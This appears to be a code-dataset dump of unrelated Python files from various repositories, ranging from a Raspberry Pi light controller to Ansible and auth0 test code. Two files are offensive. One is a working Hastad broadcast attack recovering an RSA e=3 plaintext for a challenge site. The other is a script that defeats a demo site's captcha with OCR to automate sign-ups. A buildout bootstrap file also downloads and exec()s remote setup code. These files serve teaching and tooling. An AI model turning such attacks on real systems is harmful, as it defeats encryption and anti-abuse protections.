group_test.groups_to_users.append(ryan)

for record in [group_canyon, group_test] + members:
    db.session.add(record)
db.session.commit()
| Python | 0 | |
01c98087541828421da49295abedd3d894cdb3b5 | Create luz.py | opt/luz.py | opt/luz.py | #!/usr/bin/env python
# Realizado por: Roberto Arias (@bettocr)
#
# Permite encender y apagar luces leds
#
import RPi.GPIO as GPIO, time, os
GPIO.setmode(GPIO.BCM)
on = 0 # luces encendidas
MAX=5200 # luminocidad maxima antes de encender el led, entre mayor mas oscuro
PIN=23 # pin al relay
PINRC=24 #pin que lee la photocell
GPIO.setup(PIN,GPIO.OUT)
def RCtime (RCpin):
reading = 0
GPIO.setup(RCpin, GPIO.OUT)
GPIO.output(RCpin, GPIO.LOW)
time.sleep(0.1)
GPIO.setup(RCpin, GPIO.IN)
while (GPIO.input(RCpin) == GPIO.LOW):
reading += 1
return reading
while True:
#print RCtime(24)
luz = RCtime(PINRC)
if luz > MAX:
GPIO.output(PIN,True)
on = 1
if luz < MAX and on == 1:
GPIO.output(PIN,False)
on = 0
| Python | 0.000028 | |
87af377fab216e3db9ad700e124b356b15da492f | add form_register.py | 7.验证码处理/1.form_register.py | 7.验证码处理/1.form_register.py | #!/usr/bin/env python
# coding:utf-8
import csv
import string
import urllib
import urllib2
import cookielib
import lxml.html
import pytesseract
from PIL import Image
from io import BytesIO
REGISTER_URL = 'http://example.webscraping.com/places/default/user/register'
def parse_form(html):
    """Collect every named <input> field of the form in *html*.

    Returns a dict mapping each input's ``name`` attribute to its ``value``
    (including hidden fields such as CSRF tokens).
    """
    tree = lxml.html.fromstring(html)
    return {
        field.get('name'): field.get('value')
        for field in tree.cssselect('form input')
        if field.get('name')
    }
def extract_image(html):
    """Extract the captcha image embedded in the page as a ``data:`` URI.

    Returns a PIL Image decoded from the base64 payload of the
    ``div#recaptcha img`` element's ``src`` attribute.
    """
    tree = lxml.html.fromstring(html)
    # Grab the embedded image data (a "data:image/png;base64,..." URI).
    img_data = tree.cssselect('div#recaptcha img')[0].get('src')
    # remove data:image/png;base64, header
    img_data = img_data.partition(',')[-1]
    # open('test_.png', 'wb').write(data.decode('base64'))
    binary_img_data = img_data.decode('base64')  # Python 2 str-level base64 decode
    file_like = BytesIO(binary_img_data)
    img = Image.open(file_like)
    # img.save('test.png')
    return img
def ocr(img):
    """Recognize the captcha text in *img* using the Tesseract OCR engine.

    Thresholds the image first to strip the background, then keeps only
    ASCII letters, lowercased (the captcha is lowercase).
    """
    # (debug) original captcha image: img.save('captcha_original.png')
    # Threshold the image to separate background from text: greyscale first.
    gray = img.convert('L')
    # (debug) greyscale image: gray.save('captcha_greyscale.png')
    # Keep only pixels with value < 1 (pure black); everything else is white.
    bw = gray.point(lambda x: 0 if x < 1 else 255, '1')
    # (debug) thresholded image: bw.save('captcha_threshold.png')
    word = pytesseract.image_to_string(bw)
    # The captcha uses lowercase letters only, so drop everything else and
    # lowercase the result to improve the match rate.
    ascii_word = ''.join(c for c in word if c in string.letters).lower()
    return ascii_word
def register(first_name, last_name, email, password, captcha_fn):
    """Automate the account registration flow, solving the captcha.

    :param first_name: first name to register with
    :param last_name: last name to register with
    :param email: email address to register with
    :param password: password to register with
    :param captcha_fn: callable taking a PIL image and returning the
        captcha text (e.g. :func:`ocr`)
    :return: True if registration succeeded
    """
    # Keep cookies across requests so the form/session tokens stay valid.
    cj = cookielib.CookieJar()
    opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))
    html = opener.open(REGISTER_URL).read()
    form = parse_form(html)
    form['first_name'] = first_name
    form['last_name'] = last_name
    form['email'] = email
    form['password'] = form['password_two'] = password
    # Solve the captcha embedded in the page and fill in the answer.
    img = extract_image(html)
    captcha = captcha_fn(img)
    form['recaptcha_response_field'] = captcha
    encoded_data = urllib.urlencode(form)
    request = urllib2.Request(REGISTER_URL, encoded_data)
    response = opener.open(request)
    # On success the site redirects away from the registration page.
    success = '/user/register' not in response.geturl()
    return success
def test_samples():
    """Measure OCR accuracy against the labelled sample images.

    Expects ``samples/samples.csv`` rows of (filename, expected_text) and
    prints the fraction recognized correctly.
    """
    correct = total = 0
    for filename, text in csv.reader(open('samples/samples.csv')):
        img = Image.open('samples/' + filename)
        if ocr(img) == text:
            correct += 1
        total += 1
    print 'Accuracy: %d/%d' % (correct, total)
if __name__ == '__main__':
    # Smoke test: attempt a registration, solving the captcha with OCR.
    print register(first_name='Test', last_name='Test', email='Test@webscraping.com', password='Test', captcha_fn=ocr)
| Python | 0.000002 | |
fe186bf85472cf4e683d9838e36e60c680e6dc77 | Add test | python/ql/test/library-tests/PointsTo/new/code/w_function_values.py | python/ql/test/library-tests/PointsTo/new/code/w_function_values.py | def test_conditoinal_function(cond):
    # Analyzer fixture: `f` may point to either local function depending on
    # `cond`; the chosen function's return value flows into `sink`.
    def foo():
        return "foo"
    def bar():
        return "bar"
    if cond:
        f = foo
    else:
        f = bar
    sink = f()
    return sink
# Call with both branch outcomes so points-to analysis sees both targets.
f_false = test_conditoinal_function(False)
f_true = test_conditoinal_function(True)
def foo():
    # Module-level foo, shadowed by the local redefinition below.
    return "foo"
def test_redefinition():
    # NOTE(review): because `foo` is (re)defined later in this scope, the
    # name is local throughout the function, so `f = foo` would raise
    # UnboundLocalError if actually executed -- this appears to be a
    # deliberate points-to analysis fixture, not runnable code.
    f = foo
    def foo():
        return "refined"
    sink = f()
    return sink
1afb7bb7b1f3e8ef3070f1100dac683b2b8254ee | remove unused table | xbrowse_server/base/migrations/0003_delete_xhmmfile.py | xbrowse_server/base/migrations/0003_delete_xhmmfile.py | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
    # Drops the unused XHMMFile table (the model was removed from the codebase).
    dependencies = [
        ('base', '0002_auto_20160117_1843'),
    ]
    operations = [
        migrations.DeleteModel(
            name='XHMMFile',
        ),
    ]
| Python | 0.000013 | |
49c673c5c8374867fc9bf026717fe137bdba84bc | Add test file for graph.py and add test of Greengraph class constructor | greengraph/test/test_graph.py | greengraph/test/test_graph.py | from greengraph.map import Map
from greengraph.graph import Greengraph
from mock import patch
import geopy
from nose.tools import assert_equal
start = "London"
end = "Durham"
def test_Greengraph_init():
    """Greengraph.__init__ should build a GoogleV3 geocoder and store endpoints."""
    with patch.object(geopy.geocoders,'GoogleV3') as mock_GoogleV3:
        test_Greengraph = Greengraph(start,end)
        #Test that GoogleV3 is called with the correct parameters
        # (assumes Greengraph resolves GoogleV3 through geopy.geocoders at
        # construction time -- TODO confirm against graph.py)
        mock_GoogleV3.assert_called_with(domain="maps.google.co.uk")
        #Test that the start and end fields are initialised correctly
        assert_equal(test_Greengraph.start,start)
        assert_equal(test_Greengraph.end,end)
| Python | 0 | |
54553efa024d74ec60647ea7616191a52fe9948f | Add a command to create collaborator organisations | akvo/rsr/management/commands/create_collaborator_organisation.py | akvo/rsr/management/commands/create_collaborator_organisation.py | # -*- coding: utf-8 -*-
# Akvo Reporting is covered by the GNU Affero General Public License.
# See more details in the license.txt file located at the root folder of the Akvo RSR module.
# For additional details on the GNU license please see < http://www.gnu.org/licenses/agpl.html >.
"""Create a collaborator organisation for a given organisation.
Usage:
python manage.py create_collaborator_organisation <org-id>
"""
import sys
from django.core.management.base import BaseCommand
from akvo.rsr.models import Organisation
class Command(BaseCommand):
    """Create (idempotently) a collaborator organisation for an organisation."""

    help = __doc__

    def add_arguments(self, parser):
        # Positional, required ID of the organisation to wrap.
        parser.add_argument('org_id', type=int)

    def handle(self, *args, **options):
        org_id = options['org_id']
        try:
            owner = Organisation.objects.get(id=org_id)
        except Organisation.DoesNotExist:
            sys.exit('Could not find organisation with ID: {}'.format(org_id))

        # Name fields are only applied when the collaborator is first created.
        defaults = dict(
            name='Collaborator: {}'.format(owner.name),
            long_name='Collaborator: {}'.format(owner.long_name),
        )
        collaborator, _ = Organisation.objects.get_or_create(
            content_owner=owner,
            original=owner,
            defaults=defaults,
        )
        print('Collaborator Organisation created with ID: {}'.format(collaborator.id))
| Python | 0 | |
6318c1dd7d3c942bc7702402eb6ae50a86c023b7 | add hastad | lab3/hastad/code.py | lab3/hastad/code.py | # https://id0-rsa.pub/problem/11/
import gmpy2
def crt(a, n):
    """Chinese remainder theorem
    from: http://rosettacode.org/wiki/Chinese_remainder_theorem#Python
    x = a[0] % n[0]
    x = a[1] % n[1]
    x = a[2] % n[2]
    Args:
        a(list): remainders
        n(list): modules (assumed pairwise coprime)
    Returns:
        long: solution to crt
    Raises:
        ValueError: if `a` and `n` differ in length
    """
    if len(a) != len(n):
        # Bug fix: the original called log.critical_error(), but no `log`
        # object exists anywhere in this script, so the error path itself
        # crashed with a NameError.  Raise a proper exception instead.
        raise ValueError("Different number of remainders({}) and modules({})".format(len(a), len(n)))
    total = 0  # renamed from `sum` to avoid shadowing the builtin
    prod = reduce(lambda x, y: x * y, n)
    for n_i, a_i in zip(n, a):
        p = prod / n_i  # exact: n_i divides prod (Python 2 integer division)
        total += a_i * gmpy2.invert(p, n_i) * p
    return long(total % prod)
e = 3
C1 = 0x94f145679ee247b023b09f917beea7e38707452c5f4dc443bba4d089a18ec42de6e32806cc967e09a28ea6fd2e683d5bb7258bce9e6f972d6a30d7e5acbfba0a85610261fb3e0aac33a9e833234a11895402bc828da3c74ea2979eb833cd644b8ab9e3b1e46515f47a49ee602c608812241e56b94bcf76cfbb13532d9f4ff8ba
N1 = 0xa5d1c341e4837bf7f2317024f4436fb25a450ddabd7293a0897ebecc24e443efc47672a6ece7f9cac05661182f3abbb0272444ce650a819b477fd72bf01210d7e1fbb7eb526ce77372f1aa6c9ce570066deee1ea95ddd22533cbc68b3ba20ec737b002dfc6f33dcb19e6f9b312caa59c81bb80cda1facf16536cb3c184abd1d5
C2 = 0x5ad248df283350558ba4dc22e5ec8325364b3e0b530b143f59e40c9c2e505217c3b60a0fae366845383adb3efe37da1b9ae37851811c4006599d3c1c852edd4d66e4984d114f4ea89d8b2aef45cc531cfa1ab16c7a2e04d8884a071fed79a8d30af66edf1bbbf695ff8670b9fccf83860a06e017d67b1788b19b72d597d7d8d8
N2 = 0xaf4ed50f72b0b1eec2cde78275bcb8ff59deeeb5103ccbe5aaef18b4ddc5d353fc6dc990d8b94b3d0c1750030e48a61edd4e31122a670e5e942ae224ecd7b5af7c13b6b3ff8bcc41591cbf2d8223d32eeb46ba0d7e6d9ab52a728be56cd284842337db037e1a1da246ed1da0fd9bdb423bbe302e813f3c9b3f9414b25e28bda5
C3 = 0x8a9315ee3438a879f8af97f45df528de7a43cd9cf4b9516f5a9104e5f1c7c2cdbf754b1fa0702b3af7cecfd69a425f0676c8c1f750f32b736c6498cac207aa9d844c50e654ceaced2e0175e9cfcc2b9f975e3183437db73111a4a139d48cc6ce4c6fac4bf93b98787ed8a476a9eb4db4fd190c3d8bf4d5c4f66102c6dd36b73
N3 = 0x5ca9a30effc85f47f5889d74fd35e16705c5d1a767004fec7fdf429a205f01fd7ad876c0128ddc52caebaa0842a89996379ac286bc96ebbb71a0f8c3db212a18839f7877ebd76c3c7d8e86bf6ddb17c9c93a28defb8c58983e11304d483fd7caa19b4b261fc40a19380abae30f8d274481a432c8de488d0ea7b680ad6cf7776b
# Hastad's broadcast attack: the same message encrypted with e=3 under three
# distinct moduli lets CRT recover m**3 mod (N1*N2*N3); since m < each N,
# m**3 is smaller than the product, so the CRT result IS m**3 exactly.
n_all = [N1, N2, N3]
ciphertext_all = [C1, C2, C3]
c_e = crt(ciphertext_all, n_all)
# Integer cube root recovers the plaintext integer (iroot returns (root, exact)).
c = gmpy2.iroot(c_e, e)
print c
c = long(c[0])
# Decode the integer back into ASCII plaintext (Python 2 hex decode).
print hex(c)[2:].strip('L').decode('hex')
| Python | 0.000212 | |
0fce5f54490d9ae9014280a5e0e96fd53128d299 | Add kubevirt_preset module (#52498) | lib/ansible/modules/cloud/kubevirt/kubevirt_preset.py | lib/ansible/modules/cloud/kubevirt/kubevirt_preset.py | #!/usr/bin/python
# -*- coding: utf-8 -*-
# Copyright: (c) 2019, Ansible Project
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = '''
---
module: kubevirt_preset
short_description: Manage KubeVirt virtual machine presets
description:
- Use Openshift Python SDK to manage the state of KubeVirt virtual machine presets.
version_added: "2.8"
author: KubeVirt Team (@kubevirt)
options:
state:
description:
- Create or delete virtual machine presets.
default: "present"
choices:
- present
- absent
type: str
name:
description:
- Name of the virtual machine preset.
required: true
type: str
namespace:
description:
- Namespace where the virtual machine preset exists.
required: true
type: str
selector:
description:
- "Selector is a label query over a set of virtual machine preset."
type: dict
extends_documentation_fragment:
- k8s_auth_options
- k8s_resource_options
- kubevirt_vm_options
- kubevirt_common_options
requirements:
- python >= 2.7
- openshift >= 0.8.2
'''
EXAMPLES = '''
- name: Create virtual machine preset 'vmi-preset-small'
kubevirt_preset:
state: present
name: vmi-preset-small
namespace: vms
memory: 64M
selector:
matchLabels:
kubevirt.io/vmPreset: vmi-preset-small
- name: Remove virtual machine preset 'vmi-preset-small'
kubevirt_preset:
state: absent
name: vmi-preset-small
namespace: vms
'''
RETURN = '''
kubevirt_preset:
description:
- The virtual machine preset managed by the user.
- "This dictionary contains all values returned by the KubeVirt API all options
are described here U(https://kubevirt.io/api-reference/master/definitions.html#_v1_virtualmachineinstancepreset)"
returned: success
type: complex
contains: {}
'''
import copy
import traceback
from ansible.module_utils.k8s.common import AUTH_ARG_SPEC, COMMON_ARG_SPEC
from ansible.module_utils.kubevirt import (
virtdict,
KubeVirtRawModule,
VM_COMMON_ARG_SPEC
)
KIND = 'VirtualMachineInstancePreset'
VMP_ARG_SPEC = {
'selector': {'type': 'dict'},
}
class KubeVirtVMPreset(KubeVirtRawModule):
    # Ansible module implementation for VirtualMachineInstancePreset CRUD.
    @property
    def argspec(self):
        """ argspec property builder """
        # Merge the generic k8s/auth/VM option specs with the preset-only ones.
        argument_spec = copy.deepcopy(COMMON_ARG_SPEC)
        argument_spec.update(copy.deepcopy(AUTH_ARG_SPEC))
        argument_spec.update(VM_COMMON_ARG_SPEC)
        argument_spec.update(VMP_ARG_SPEC)
        return argument_spec
    def execute_module(self):
        """Build the preset definition and create/delete it via the k8s API."""
        # Parse parameters specific for this module:
        definition = virtdict()
        selector = self.params.get('selector')
        if selector:
            definition['spec']['selector'] = selector
        # FIXME: Devices must be set, but we don't yet support any
        # attributes there, remove when we do:
        definition['spec']['domain']['devices'] = dict()
        # Execute the CURD of VM:
        dummy, definition = self.construct_vm_definition(KIND, definition, definition)
        result_crud = self.execute_crud(KIND, definition)
        changed = result_crud['changed']
        result = result_crud.pop('result')
        # Return from the module:
        self.exit_json(**{
            'changed': changed,
            'kubevirt_preset': result,
            'result': result_crud,
        })
def main():
    # Entry point: instantiate the module and report any unexpected failure
    # back to Ansible via fail_json (broad except is the Ansible-module
    # convention -- the controller needs JSON, not a traceback on stderr).
    module = KubeVirtVMPreset()
    try:
        module.execute_module()
    except Exception as e:
        module.fail_json(msg=str(e), exception=traceback.format_exc())
if __name__ == '__main__':
    main()
| Python | 0 | |
a3d837afe6662edb10395baa8851de551d0915a5 | add email templates tests | auth0/v3/test/management/test_email_endpoints.py | auth0/v3/test/management/test_email_endpoints.py | import unittest
import mock
from ...management.email_templates import EmailTemplates
class TestClients(unittest.TestCase):
    # NOTE(review): the class name says "Clients" but these tests exercise
    # the EmailTemplates endpoints -- likely copied from another test module;
    # renaming is left to a dedicated change since discovery uses the name.
    @mock.patch('auth0.v3.management.email_templates.RestClient')
    def test_create(self, mock_rc):
        # create() should POST the payload to the collection endpoint.
        mock_instance = mock_rc.return_value
        c = EmailTemplates(domain='domain', token='jwttoken')
        c.create({'a': 'b', 'c': 'd'})
        mock_instance.post.assert_called_with(
            'https://domain/api/v2/email-templates',
            data={'a': 'b', 'c': 'd'}
        )
    @mock.patch('auth0.v3.management.email_templates.RestClient')
    def test_get(self, mock_rc):
        # get() should GET the template addressed by name.
        mock_instance = mock_rc.return_value
        c = EmailTemplates(domain='domain', token='jwttoken')
        c.get('this-template-name')
        mock_instance.get.assert_called_with(
            'https://domain/api/v2/email-templates/this-template-name'
        )
    @mock.patch('auth0.v3.management.email_templates.RestClient')
    def test_update(self, mock_rc):
        # update() should PATCH the named template with the payload.
        mock_instance = mock_rc.return_value
        c = EmailTemplates(domain='domain', token='jwttoken')
        c.update('this-template-name', {'a': 'b', 'c': 'd'})
        mock_instance.patch.assert_called_with(
            'https://domain/api/v2/email-templates/this-template-name',
            data={'a': 'b', 'c': 'd'}
        )
| Python | 0.000001 | |
39b939551e5530fd1c776dffdc016b715dc6819a | Add bootstrap | bootstrap.py | bootstrap.py | ##############################################################################
#
# Copyright (c) 2006 Zope Foundation and Contributors.
# All Rights Reserved.
#
# This software is subject to the provisions of the Zope Public License,
# Version 2.1 (ZPL). A copy of the ZPL should accompany this distribution.
# THIS SOFTWARE IS PROVIDED "AS IS" AND ANY AND ALL EXPRESS OR IMPLIED
# WARRANTIES ARE DISCLAIMED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF TITLE, MERCHANTABILITY, AGAINST INFRINGEMENT, AND FITNESS
# FOR A PARTICULAR PURPOSE.
#
##############################################################################
"""Bootstrap a buildout-based project
Simply run this script in a directory containing a buildout.cfg.
The script accepts buildout command-line options, so you can
use the -c option to specify an alternate configuration file.
"""
import os
import shutil
import sys
import tempfile
from optparse import OptionParser
__version__ = '2015-07-01'
# See zc.buildout's changelog if this version is up to date.
# Temporary directory used as the egg cache for the bootstrap run.
tmpeggs = tempfile.mkdtemp(prefix='bootstrap-')
usage = '''\
[DESIRED PYTHON FOR BUILDOUT] bootstrap.py [options]
Bootstraps a buildout-based project.
Simply run this script in a directory containing a buildout.cfg, using the
Python that you want bin/buildout to use.
Note that by using --find-links to point to local resources, you can keep
this script from going over the network.
'''
# Command-line interface (optparse, for Python 2 compatibility).
parser = OptionParser(usage=usage)
parser.add_option("--version",
                  action="store_true", default=False,
                  help=("Return bootstrap.py version."))
parser.add_option("-t", "--accept-buildout-test-releases",
                  dest='accept_buildout_test_releases',
                  action="store_true", default=False,
                  help=("Normally, if you do not specify a --version, the "
                        "bootstrap script and buildout gets the newest "
                        "*final* versions of zc.buildout and its recipes and "
                        "extensions for you. If you use this flag, "
                        "bootstrap and buildout will get the newest releases "
                        "even if they are alphas or betas."))
parser.add_option("-c", "--config-file",
                  help=("Specify the path to the buildout configuration "
                        "file to be used."))
parser.add_option("-f", "--find-links",
                  help=("Specify a URL to search for buildout releases"))
parser.add_option("--allow-site-packages",
                  action="store_true", default=False,
                  help=("Let bootstrap.py use existing site packages"))
parser.add_option("--buildout-version",
                  help="Use a specific zc.buildout version")
parser.add_option("--setuptools-version",
                  help="Use a specific setuptools version")
parser.add_option("--setuptools-to-dir",
                  help=("Allow for re-use of existing directory of "
                        "setuptools versions"))
options, args = parser.parse_args()
if options.version:
    print("bootstrap.py version %s" % __version__)
    sys.exit(0)
######################################################################
# load/install setuptools
# Python 2/3 compatible import of urlopen.
try:
    from urllib.request import urlopen
except ImportError:
    from urllib2 import urlopen
# Run ez_setup (local copy if present, otherwise fetched from PyPA) in the
# `ez` namespace; it defines use_setuptools() which installs setuptools.
ez = {}
if os.path.exists('ez_setup.py'):
    exec(open('ez_setup.py').read(), ez)
else:
    exec(urlopen('https://bootstrap.pypa.io/ez_setup.py').read(), ez)
if not options.allow_site_packages:
    # ez_setup imports site, which adds site packages
    # this will remove them from the path to ensure that incompatible versions
    # of setuptools are not in the path
    import site
    # inside a virtualenv, there is no 'getsitepackages'.
    # We can't remove these reliably
    if hasattr(site, 'getsitepackages'):
        for sitepackage_path in site.getsitepackages():
            # Strip all site-packages directories from sys.path that
            # are not sys.prefix; this is because on Windows
            # sys.prefix is a site-package directory.
            if sitepackage_path != sys.prefix:
                sys.path[:] = [x for x in sys.path
                               if sitepackage_path not in x]
setup_args = dict(to_dir=tmpeggs, download_delay=0)
if options.setuptools_version is not None:
    setup_args['version'] = options.setuptools_version
if options.setuptools_to_dir is not None:
    setup_args['to_dir'] = options.setuptools_to_dir
ez['use_setuptools'](**setup_args)
import setuptools
import pkg_resources
# This does not (always?) update the default working set. We will
# do it.
for path in sys.path:
    if path not in pkg_resources.working_set.entries:
        pkg_resources.working_set.add_entry(path)
######################################################################
# Install buildout
ws = pkg_resources.working_set
setuptools_path = ws.find(
    pkg_resources.Requirement.parse('setuptools')).location
# Fix sys.path here as easy_install.pth added before PYTHONPATH
# Build an easy_install command that installs into the temporary egg dir.
cmd = [sys.executable, '-c',
       'import sys; sys.path[0:0] = [%r]; ' % setuptools_path +
       'from setuptools.command.easy_install import main; main()',
       '-mZqNxd', tmpeggs]
find_links = os.environ.get(
    'bootstrap-testing-find-links',
    options.find_links or
    ('http://downloads.buildout.org/'
     if options.accept_buildout_test_releases else None)
    )
if find_links:
    cmd.extend(['-f', find_links])
requirement = 'zc.buildout'
version = options.buildout_version
if version is None and not options.accept_buildout_test_releases:
    # Figure out the most recent final version of zc.buildout.
    import setuptools.package_index
    _final_parts = '*final-', '*final'
    def _final_version(parsed_version):
        # True when parsed_version is a final (non pre-release) version.
        try:
            return not parsed_version.is_prerelease
        except AttributeError:
            # Older setuptools
            for part in parsed_version:
                if (part[:1] == '*') and (part not in _final_parts):
                    return False
            return True
    index = setuptools.package_index.PackageIndex(
        search_path=[setuptools_path])
    if find_links:
        index.add_find_links((find_links,))
    req = pkg_resources.Requirement.parse(requirement)
    if index.obtain(req) is not None:
        best = []
        bestv = None
        for dist in index[req.project_name]:
            distv = dist.parsed_version
            if _final_version(distv):
                if bestv is None or distv > bestv:
                    best = [dist]
                    bestv = distv
                elif distv == bestv:
                    best.append(dist)
        if best:
            best.sort()
            version = best[-1].version
if version:
    requirement = '=='.join((requirement, version))
cmd.append(requirement)
import subprocess
if subprocess.call(cmd) != 0:
    raise Exception(
        "Failed to execute command:\n%s" % repr(cmd)[1:-1])
######################################################################
# Import and run buildout
ws.add_entry(tmpeggs)
ws.require(requirement)
import zc.buildout.buildout
# Default to the 'bootstrap' command when no command was given (only
# assignments like key=value were passed).
if not [a for a in args if '=' not in a]:
    args.append('bootstrap')
# if -c was provided, we push it back into args for buildout' main function
if options.config_file is not None:
    args[0:0] = ['-c', options.config_file]
zc.buildout.buildout.main(args)
# Clean up the temporary egg cache.
shutil.rmtree(tmpeggs)
| Python | 0.000003 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.